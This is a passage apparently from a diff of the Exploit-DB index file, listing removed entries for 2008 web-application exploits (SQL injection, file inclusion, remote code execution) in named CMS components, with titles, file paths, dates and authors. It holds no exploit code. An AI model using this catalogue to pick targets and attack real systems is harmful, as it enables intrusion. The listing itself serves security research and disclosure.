-4963,exploits/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps, -4964,exploits/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps, -4965,exploits/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps, -4966,exploits/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps, -4968,exploits/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps, -4969,exploits/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps, -4970,exploits/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,asp,webapps, -4971,exploits/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps, -4972,exploits/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,asp,webapps, -4973,exploits/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps, -4975,exploits/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Local File Inclusion",2008-01-23,The_HuliGun,php,webapps, -4976,exploits/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Local File Inclusion",2008-01-23,Stack,php,webapps, -4977,exploits/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps, -4980,exploits/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Remote File Disclosure",2008-01-24,fuzion,php,webapps, -4984,exploits/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps, -4985,exploits/php/webapps/4985.txt,"flinx 1.3 - 'id' SQL Injection",2008-01-25,Houssamix,php,webapps, -4988,exploits/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps, -4989,exploits/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps, -4990,exploits/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps, -4991,exploits/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusions",2008-01-26,Stack,php,webapps, -4992,exploits/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps, -4993,exploits/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps, -5000,exploits/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps, -5001,exploits/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Remote File Disclosure",2008-01-28,Stack,php,webapps, -5002,exploits/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' SQL Injection",2008-01-29,D4m14n,php,webapps, -5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,php,webapps, -5006,exploits/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Remote File Disclosure",2008-01-29,DSecRG,php,webapps, -5007,exploits/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps, -5008,exploits/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps, -5009,exploits/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps, -5010,exploits/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps, -5011,exploits/php/webapps/5011.txt,"Mambo Component musepoes - 'aid' SQL Injection",2008-01-30,S@BUN,php,webapps, -5012,exploits/php/webapps/5012.pl,"Connectix Boards 0.8.2 - 'template_path' Remote File Inclusion",2008-01-30,Houssamix,php,webapps, -5013,exploits/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - 'adclick.php' SQL Injection",2008-01-30,enter_the_dragon,php,webapps, -5014,exploits/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' SQL Injection",2008-01-30,S@BUN,php,webapps, -5015,exploits/php/webapps/5015.txt,"Mambo Component jokes 1.0 - 'cat' SQL Injection",2008-01-30,S@BUN,php,webapps, -5016,exploits/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps, -5017,exploits/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - 'to_date' SQL Injection",2008-01-30,enter_the_dragon,php,webapps, -5018,exploits/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,php,webapps, -5019,exploits/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,php,webapps, -5020,exploits/php/webapps/5020.txt,"Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps, -5021,exploits/php/webapps/5021.txt,"PHP Links 1.3 - 'id' SQL Injection",2008-01-30,Houssamix,php,webapps, -5022,exploits/php/webapps/5022.txt,"PHP Links 1.3 - 'smarty.php' Remote File Inclusion",2008-01-30,Houssamix,php,webapps, -5026,exploits/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusions",2008-01-31,"David Wharton",php,webapps, -5027,exploits/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps, -5029,exploits/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps, -5030,exploits/php/webapps/5030.txt,"Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps, -5031,exploits/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps, -5033,exploits/php/webapps/5033.txt,"LightBlog 9.5 - 'cp_upload_image.php' Arbitrary File Upload",2008-02-01,Omni,php,webapps, -5034,exploits/php/webapps/5034.txt,"Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,php,webapps, -5035,exploits/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps, -5037,exploits/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps, -5039,exploits/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps, -5040,exploits/php/webapps/5040.txt,"BookmarkX script 2007 - 'topicid' SQL Injection",2008-02-02,S@BUN,php,webapps, -5041,exploits/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps, -5042,exploits/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps, -5047,exploits/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,php,webapps, -5050,exploits/php/webapps/5050.pl,"A-Blog 2.0 - Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps, -5053,exploits/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps, -5055,exploits/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps, -5056,exploits/php/webapps/5056.txt,"ITechBids 5.0 - 'item_id' SQL Injection",2008-02-04,QTRinux,php,webapps, -5057,exploits/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps, -5058,exploits/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - 'listid' SQL Injection",2008-02-04,S@BUN,php,webapps, -5059,exploits/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,php,webapps, -5060,exploits/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,php,webapps, -5061,exploits/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,php,webapps, -5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,php,webapps, -5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,php,webapps, -5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,php,webapps, -5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",php,webapps, -5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,php,webapps, -5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,php,webapps, -5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,php,webapps, -5072,exploits/php/webapps/5072.txt,"Joomla! Component Ynews 1.0.0 - 'id' SQL Injection",2008-02-06,Crackers_Child,php,webapps, -5073,exploits/php/webapps/5073.txt,"Mambo Component com_downloads - SQL Injection",2008-02-06,S@BUN,php,webapps, -5074,exploits/php/webapps/5074.php,"Mihalism Multi Host Download - 'Username' Blind SQL Injection",2008-02-06,Moubik,php,webapps, -5075,exploits/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps, -5076,exploits/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,php,webapps, -5080,exploits/php/webapps/5080.txt,"Joomla! Component com_doc - SQL Injection",2008-02-07,S@BUN,php,webapps, -5081,exploits/php/webapps/5081.txt,"Joomla! Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,php,webapps, -5082,exploits/php/webapps/5082.txt,"PowerNews 2.5.6 - Local File Inclusion",2008-02-08,DSecRG,php,webapps, -5083,exploits/php/webapps/5083.txt,"Joomla! Component NeoGallery 1.1 - SQL Injection",2008-02-08,S@BUN,php,webapps, -5084,exploits/php/webapps/5084.txt,"Mambo Component com_gallery - SQL Injection",2008-02-08,S@BUN,php,webapps, -5088,exploits/php/webapps/5088.py,"Limbo CMS 1.0.4.2 - 'Cuid' cookie Blind SQL Injection",2008-02-09,The:Paradox,php,webapps, -5089,exploits/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,php,webapps, -5090,exploits/php/webapps/5090.pl,"Open-Realty 2.4.3 - 'last_module' Remote Code Execution",2008-02-09,Iron,php,webapps, -5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,php,webapps, -5094,exploits/php/webapps/5094.txt,"Mambo Component Comments 0.5.8.5g - SQL Injection",2008-02-09,CheebaHawk215,php,webapps, -5095,exploits/php/webapps/5095.txt,"PK-Designs PKs Movie Database 3.0.3 - Cross-Site Scripting / SQL Injection",2008-02-10,Houssamix,php,webapps, -5096,exploits/php/webapps/5096.txt,"ITechBids 6.0 - 'item_id' SQL Injection",2008-02-10,"SoSo H H",php,webapps, -5097,exploits/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,php,webapps, -5098,exploits/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,php,webapps, -5099,exploits/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' SQL Injection",2008-02-10,halkfild,php,webapps, -5101,exploits/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' SQL Injection",2008-02-12,NTOS-Team,php,webapps, -5103,exploits/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps, -5104,exploits/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps, -5105,exploits/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps, -5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps, -5109,exploits/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' SQL Injection",2008-02-13,S@BUN,php,webapps, -5112,exploits/jsp/webapps/5112.txt,"jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps, -5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps, -5115,exploits/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps, -5116,exploits/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusions",2008-02-14,muuratsalo,php,webapps, -5117,exploits/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' SQL Injection",2008-02-14,S@BUN,php,webapps, -5118,exploits/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' SQL Injection",2008-02-14,S@BUN,php,webapps, -5119,exploits/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' SQL Injection",2008-02-14,S@BUN,php,webapps, -5120,exploits/php/webapps/5120.pl,"Joomla! Component mediaslide - 'albumnum' Blind SQL Injection",2008-02-14,Inphex,php,webapps, -5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,php,webapps, -5123,exploits/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps, -5124,exploits/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps, -5125,exploits/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (1)",2008-02-14,Xar,php,webapps, -5126,exploits/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps, -5127,exploits/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps, -5128,exploits/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' SQL Injection",2008-02-15,Don,php,webapps, -5129,exploits/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps, -5130,exploits/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps, -5131,exploits/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' SQL Injection",2008-02-16,JosS,php,webapps, -5132,exploits/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps, -5133,exploits/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps, -5134,exploits/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps, -5135,exploits/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps, -5136,exploits/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps, -5137,exploits/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Remote File Disclosure",2008-02-17,GoLd_M,php,webapps, -5138,exploits/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - 'refer.php' SQL Injection",2008-02-18,ka0x,php,webapps, -5139,exploits/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps, -5140,exploits/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps, -5145,exploits/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' SQL Injection",2008-02-18,S@BUN,php,webapps, -5146,exploits/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps, -5147,exploits/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps, -5148,exploits/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps, -5149,exploits/php/webapps/5149.txt,"sCssBoard (Multiple Versions) - 'pwnpack' Remote s",2008-02-18,Inphex,php,webapps, -5154,exploits/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' SQL Injection",2008-02-19,S@BUN,php,webapps, -5155,exploits/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' SQL Injection",2008-02-19,"Mehmet Ince",php,webapps, -5156,exploits/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps, -5157,exploits/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps, -5158,exploits/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps, -5159,exploits/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' SQL Injection",2008-02-20,"Mehmet Ince",php,webapps, -5160,exploits/php/webapps/5160.txt,"Joomla! Component Highwood Design hwdVideoShare - SQL Injection",2008-02-20,S@BUN,php,webapps, -5161,exploits/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' SQL Injection",2008-02-20,DamaR,php,webapps, -5162,exploits/php/webapps/5162.txt,"Globsy 1.0 - 'file' Remote File Disclosure",2008-02-20,GoLd_M,php,webapps, -5163,exploits/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' SQL Injection",2008-02-20,Crackers_Child,php,webapps, -5164,exploits/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps, -5165,exploits/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery",2008-02-21,EpiBite,php,webapps, -5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,php,webapps, -5168,exploits/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",php,webapps, -5169,exploits/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps, -5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,php,webapps, -5171,exploits/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection",2008-02-21,"Marcin Kopec",php,webapps, -5172,exploits/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection",2008-02-21,DamaR,php,webapps, -5173,exploits/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusions",2008-02-22,RoMaNcYxHaCkEr,php,webapps, -5174,exploits/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps, -5175,exploits/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion",2008-02-23,CraCkEr,php,webapps, -5176,exploits/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - 'footer.php' Remote File Inclusion",2008-02-23,GoLd_M,php,webapps, -5177,exploits/php/webapps/5177.txt,"Joomla! Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,php,webapps, -5178,exploits/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps, -5179,exploits/php/webapps/5179.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion",2008-02-23,BeyazKurt,php,webapps, -5180,exploits/php/webapps/5180.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Remote File Inclusion",2008-02-24,CraCkEr,php,webapps, -5181,exploits/php/webapps/5181.txt,"pigyard art Gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps, -5182,exploits/php/webapps/5182.txt,"Portail Web PHP 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps, -5183,exploits/php/webapps/5183.txt,"PHP Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps, -5185,exploits/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,asp,webapps, -5186,exploits/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' SQL Injection",2008-02-25,xcorpitx,php,webapps, -5187,exploits/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' SQL Injection",2008-02-25,S@BUN,asp,webapps, -5189,exploits/php/webapps/5189.pl,"DBHcms 1.1.4 - 'code' Remote File Inclusion",2008-02-25,Iron,php,webapps, -5192,exploits/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin",2008-02-26,r3dm0v3,php,webapps, -5194,exploits/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution",2008-02-26,NBBN,php,webapps, -5195,exploits/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps, -5196,exploits/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps, -5197,exploits/php/webapps/5197.txt,"GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion",2008-02-27,CraCkEr,php,webapps, -5198,exploits/php/webapps/5198.txt,"Dream4 Koobi Pro 5.7 - 'categ' SQL Injection",2008-02-28,Cr@zy_King,php,webapps, -5199,exploits/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusions",2008-02-28,MhZ91,php,webapps, -5200,exploits/php/webapps/5200.txt,"Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,php,webapps, -5202,exploits/php/webapps/5202.txt,"Barryvan Compo Manager 0.3 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps, -5203,exploits/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps, -5204,exploits/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps, -5206,exploits/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' SQL Injection",2008-02-29,JosS,php,webapps, -5207,exploits/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps, -5208,exploits/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' SQL Injection",2008-03-01,"SoSo H H",php,webapps, -5209,exploits/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' SQL Injection",2008-03-01,Cr@zy_King,php,webapps, -5211,exploits/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps, -5214,exploits/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps, -5216,exploits/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps, -5218,exploits/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps, -5219,exploits/php/webapps/5219.php,"zKup CMS 2.0 < 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps, -5220,exploits/php/webapps/5220.php,"zKup CMS 2.0 < 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps, -5221,exploits/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' SQL Injection",2008-03-08,S@BUN,php,webapps, -5222,exploits/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps, -5223,exploits/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps, -5226,exploits/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' SQL Injection",2008-03-10,Don,php,webapps, -5231,exploits/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' SQL Injection",2008-03-10,"Charles Fol",php,webapps, -5232,exploits/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps, -5233,exploits/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps, -5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps, -5236,exploits/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps, -5237,exploits/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps, -5239,exploits/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps, -5240,exploits/php/webapps/5240.html,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps, -5241,exploits/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps, -5242,exploits/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps, -5243,exploits/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps, -5244,exploits/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps, -5245,exploits/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps, -5246,exploits/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps, -5247,exploits/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps, -5252,exploits/php/webapps/5252.txt,"eXV2 Module MyAnnonces - 'lid' SQL Injection",2008-03-14,S@BUN,php,webapps, -5253,exploits/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - 'blog_id' SQL Injection",2008-03-14,S@BUN,php,webapps, -5254,exploits/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - 'kid' SQL Injection",2008-03-14,S@BUN,php,webapps, -5255,exploits/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - 'roomid' SQL Injection",2008-03-14,S@BUN,php,webapps, -5256,exploits/php/webapps/5256.pl,"AuraCMS 2.2.1 - 'X-Forwarded-For' HTTP Header Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps, -5260,exploits/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion",2008-03-14,irk4z,php,webapps, -5262,exploits/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps, -5263,exploits/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps, -5265,exploits/php/webapps/5265.txt,"Exero CMS 1.0.1 - 'theme' Multiple Local File Inclusions",2008-03-17,GoLd_M,php,webapps, -5266,exploits/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusions",2008-03-17,RoMaNcYxHaCkEr,php,webapps, -5267,exploits/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps, -5273,exploits/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps, -5274,exploits/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps, -5275,exploits/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL 